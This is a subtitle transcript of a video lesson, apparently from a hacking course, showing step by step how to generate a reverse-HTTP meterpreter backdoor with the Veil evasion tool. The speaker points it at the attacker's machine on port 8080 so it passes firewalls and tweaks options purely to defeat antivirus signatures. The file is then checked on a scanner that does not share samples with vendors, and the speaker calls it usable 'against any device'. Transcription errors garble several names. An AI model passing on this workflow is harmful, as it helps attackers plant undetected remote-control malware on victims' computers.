1
00:00:01,600 --> 00:00:06,940
OK so in this video we're going to be used unveil to create a backdoor.

2
00:00:07,090 --> 00:00:12,100
So the first thing I'm going to do is I'm going to do list to list the available tools and I'm going

3
00:00:12,100 --> 00:00:15,370
to use number one because we want to use evasion.

4
00:00:15,820 --> 00:00:22,560
And then I'm going to list my payloads and like I said in the previous lecture I want to use go metric

5
00:00:22,640 --> 00:00:24,810
better reverse DTP.

6
00:00:24,880 --> 00:00:30,640
So that's number 50 and so I'm going to do use 15.

7
00:00:30,810 --> 00:00:36,840
And that's going to list the first of all it's going to show me information about this particular payload

8
00:00:37,200 --> 00:00:41,800
and then it will show me the options that I can set for this payload.

9
00:00:41,820 --> 00:00:47,330
So the main option that you want to set and the most important one is the IP address.

10
00:00:47,340 --> 00:00:52,240
So this is the IP address which you're going to be receiving the connections on.

11
00:00:52,320 --> 00:00:57,960
As we said we're going to have a reverse connection and we need to set the IP address which the payload

12
00:00:57,990 --> 00:01:04,110
or the back door will try to connect back to and in our case we want to receive the connection back

13
00:01:04,320 --> 00:01:05,850
to this Kalli machine.

14
00:01:05,850 --> 00:01:11,680
So we're going to set the IP host to the IP address of the current Callimachi.

15
00:01:12,270 --> 00:01:16,620
Now to get the IP of my tally machine I have to run ifconfig.

16
00:01:16,860 --> 00:01:24,970
So I'm going to split the screen by doing right like and click on splits horizontally and I'm just going

17
00:01:24,970 --> 00:01:26,240
to bring this down a bit.

18
00:01:27,500 --> 00:01:29,000
And we're going to run it.

19
00:01:33,650 --> 00:01:38,940
Now you can see the IP address in here is 10 20 14 to 13.

20
00:01:39,050 --> 00:01:44,750
This is the IP of my Callimachi and this is the IP of the machine that I'm using as the attack machine.

21
00:01:44,750 --> 00:01:47,330
So this is where I want the connection to come back to.

22
00:01:47,390 --> 00:01:51,960
So I can hide the target computer once the backdoor is executed.

23
00:01:52,400 --> 00:02:05,950
So I'm going to set L. host to 10 2014 into 13 so you can set any of these options using the set command.

24
00:02:05,950 --> 00:02:10,780
So all you have to do is write set followed by the option that you want to change.

25
00:02:10,780 --> 00:02:19,360
So in this case we want to change the host and we want to change that to 10 20 2014 to 13.

26
00:02:19,370 --> 00:02:25,330
Now the airport is set to 80 which is really good because that's the port that's used by web servers.

27
00:02:25,340 --> 00:02:30,470
So as I said the connection will look as if the target person is connecting to a website and it's not

28
00:02:30,470 --> 00:02:31,690
going to be suspicious.

29
00:02:32,030 --> 00:02:36,680
But I don't want to use that port because I'll have a web server running on this and we'll talk about

30
00:02:36,680 --> 00:02:37,740
that later.

31
00:02:37,760 --> 00:02:43,700
So I'm going to change that to 80 80 88 is another port that used by web servers.

32
00:02:43,730 --> 00:02:48,290
So it's still not suspicious and it should still bypass firewalls.

33
00:02:48,470 --> 00:02:53,830
So I'm just going to do set same way that we did it before with the host.

34
00:02:53,830 --> 00:03:00,010
We're going to do airport to the value that we want to set this option to and we're going to set it

35
00:03:00,010 --> 00:03:03,350
to 80 80.

36
00:03:03,380 --> 00:03:14,320
Now if I do options again to list all the options you'll see that the host change to 10 2014 to 13 and

37
00:03:14,320 --> 00:03:17,960
the Allport changed to 80 80.

38
00:03:17,980 --> 00:03:26,450
Now if you generate the back door like this you will bypass all antivirus programs except EVGA.

39
00:03:26,620 --> 00:03:27,670
I've already tried this.

40
00:03:27,670 --> 00:03:29,160
That's how I know this.

41
00:03:29,350 --> 00:03:32,830
And that's not good enough because we want to bypass everything.

42
00:03:33,400 --> 00:03:41,860
Now the way anti-virus programs work is they have a very large database of signatures these signatures

43
00:03:41,860 --> 00:03:45,180
correspond to files that contain harmful code.

44
00:03:45,490 --> 00:03:51,700
So what they do is they compare the signature of your file of your backdoor to all the files in this

45
00:03:51,700 --> 00:03:53,250
huge database.

46
00:03:53,350 --> 00:04:00,280
If your file matches any of these files then they'll flag it as a virus or as malware if it doesn't

47
00:04:00,460 --> 00:04:08,330
then they'll think that it's a normal file and it's not malware So the main point in here is we're going

48
00:04:08,330 --> 00:04:15,080
to try to modify the file our backdoor as much as possible to make it more unique so that it bypasses

49
00:04:15,080 --> 00:04:21,440
the signature database and we'll be able to bypass antivirus programs now as I said Bill is already

50
00:04:21,440 --> 00:04:22,280
doing that for us.

51
00:04:22,280 --> 00:04:23,890
It's encrypting the backdoor.

52
00:04:23,960 --> 00:04:29,780
It's obfuscating it it's injecting it into memory so that it doesn't get detected and it's doing a good

53
00:04:29,780 --> 00:04:30,340
job at it.

54
00:04:30,350 --> 00:04:34,640
It's bypassing pretty much everything except for only one antivirus program.

55
00:04:34,640 --> 00:04:40,490
So just to bypass this last antivirus program I'm going to set some optional options that really won't

56
00:04:40,490 --> 00:04:44,570
do much of a difference they'll just make the backdoor look a bit different.

57
00:04:45,230 --> 00:04:51,620
So the first thing that I'm going to modify is processor's and that's the minimum number of processors

58
00:04:51,620 --> 00:04:53,760
to be used by the back door.

59
00:04:53,780 --> 00:04:57,800
I'm not going to set a huge number because that will just make my backdoor not work.

60
00:04:58,070 --> 00:05:02,010
I'm just going to set it to one which is pretty much nothing really.

61
00:05:02,040 --> 00:05:06,020
But I'm just going to set this option to make the code look a bit different.

62
00:05:06,140 --> 00:05:11,450
So I'm going to do set again the same way that you are setting the airport and the host were just going

63
00:05:11,450 --> 00:05:19,180
to put the option name which is processor's and we're going to set that to number one.

64
00:05:19,310 --> 00:05:26,170
And I'm also going to set another option which is the sleep option and that basically lets the backdoor

65
00:05:26,180 --> 00:05:32,120
sleep for a number of seconds that you set before it executes the evil code that you have in there before

66
00:05:32,140 --> 00:05:34,160
it executes the payload.

67
00:05:34,160 --> 00:05:35,970
So I'm going to set this to six.

68
00:05:36,020 --> 00:05:38,330
Again no real reason for this.

69
00:05:38,330 --> 00:05:41,390
I'm only doing this to make the backdoor look a bit different.

70
00:05:41,510 --> 00:05:45,830
So I'm going to do set sleep to six.

71
00:05:46,060 --> 00:05:51,400
So I'm going to hit enter and I'm going to do options again to make sure that all the options are set

72
00:05:51,410 --> 00:05:53,190
the way I want them to be.

73
00:05:53,240 --> 00:05:57,980
So I have my IP address set properly.

74
00:05:57,980 --> 00:06:02,500
I have my airport I have my processors and I have my sleep.

75
00:06:02,750 --> 00:06:07,500
So I'm going to generate the back door.

76
00:06:07,560 --> 00:06:10,880
Now it's asking me to name this back door or something.

77
00:06:10,890 --> 00:06:21,110
So I'm going to name the specter of Heyse TTP as 80 80 just so that we can remember which payload and

78
00:06:21,110 --> 00:06:23,720
which port to use for this back door in the future.

79
00:06:25,330 --> 00:06:31,350
Now the back door is generated and you can see it's telling us the module that's used and it's telling

80
00:06:31,360 --> 00:06:33,540
us where the back door is stored.

81
00:06:33,580 --> 00:06:36,780
So the back door is stored in this path right here.

82
00:06:36,910 --> 00:06:40,880
So I'm going to copy that.

83
00:06:40,890 --> 00:06:47,280
Let's go ahead and check to see if the back door is detected by any antivirus programs.

84
00:06:47,280 --> 00:06:54,960
Now you can use the built in feature by using the check Vittie command but this feature only uses the

85
00:06:54,960 --> 00:06:58,180
signature of the file and it's not 100 percent accurate.

86
00:06:58,290 --> 00:07:04,170
Sometimes it tells you that the file will bypass all any viruses but it'll actually be detected.

87
00:07:04,200 --> 00:07:07,890
You can also use Virus Total But I don't recommend that.

88
00:07:07,890 --> 00:07:14,250
And please don't do that because if you do that your backdoor will become less effective because Virus

89
00:07:14,250 --> 00:07:18,900
Total share the results of their scans with antivirus programs.

90
00:07:18,930 --> 00:07:22,750
What we're going to do is we're going to use a Web site called not distribute.

91
00:07:22,920 --> 00:07:24,080
So we're going to go to it now

92
00:07:27,950 --> 00:07:32,350
so I'm just going to Google for not distribute.

93
00:07:32,540 --> 00:07:35,460
And what this is going to do it's similar to Virus Total.

94
00:07:35,540 --> 00:07:40,880
The only difference is it's not going to share these kind of results with antivirus programs.

95
00:07:40,880 --> 00:07:43,380
So it won't affect your back.

96
00:07:43,460 --> 00:07:48,860
So I'm going to click on browse to navigate to my file and I'm just going to copy where the file is

97
00:07:48,860 --> 00:07:49,250
stored.

98
00:07:49,250 --> 00:07:54,960
So Bill is telling me now it's stored in this location and user share will output comp..

99
00:07:55,370 --> 00:08:00,020
So I'm going to copy this and I'm going to come here.

100
00:08:00,020 --> 00:08:09,540
I'm going to click on the pen and I'm going to paste the location I'm going to click on open and scanned

101
00:08:09,540 --> 00:08:14,280
the file.

102
00:08:14,320 --> 00:08:18,730
Now as you can see I've already scanned this file and it's telling me that this file has been scanned

103
00:08:18,730 --> 00:08:19,510
before.

104
00:08:19,510 --> 00:08:27,760
So I'm just going to click on View previous results and as you can see the file is actually scanned

105
00:08:27,760 --> 00:08:32,540
on the same day as today which is the 29th of March 2017.

106
00:08:32,680 --> 00:08:41,780
And as you can see the file is bypassing all antivirus programs so we can use this backdoor against

107
00:08:41,840 --> 00:08:48,830
any device and we'll be sure that the device or the computer will not be able to detect this file as

108
00:08:48,890 --> 00:08:50,480
a virus.

109
00:08:50,480 --> 00:08:52,850
Now there's a few things to keep in mind.

110
00:08:52,910 --> 00:08:58,640
Antivirus programs always update their database and will always update their code as well.

111
00:08:58,640 --> 00:09:02,340
So you want to always make this all up to date.

112
00:09:02,630 --> 00:09:09,890
Also sometimes with the same exact backdoor it might get detected and it might not get detected because

113
00:09:10,100 --> 00:09:16,190
depending on the way the backdoor is getting encrypted and it's getting generated I've actually generated

114
00:09:16,190 --> 00:09:20,450
this backdoor before with sleep of with no sleep.

115
00:09:20,450 --> 00:09:26,930
And as I said it got it got detected by one antivirus program generated within seconds and it still

116
00:09:26,930 --> 00:09:28,720
got detected and then was six.

117
00:09:28,730 --> 00:09:30,880
It was able to bypass it.

118
00:09:30,890 --> 00:09:33,480
So you want to keep playing around with the options.

119
00:09:33,590 --> 00:09:39,680
You want to keep playing around with the payloads until you managed to achieve the best results so that

120
00:09:39,680 --> 00:09:42,800
you can bypass as much anti-virus programs as possible.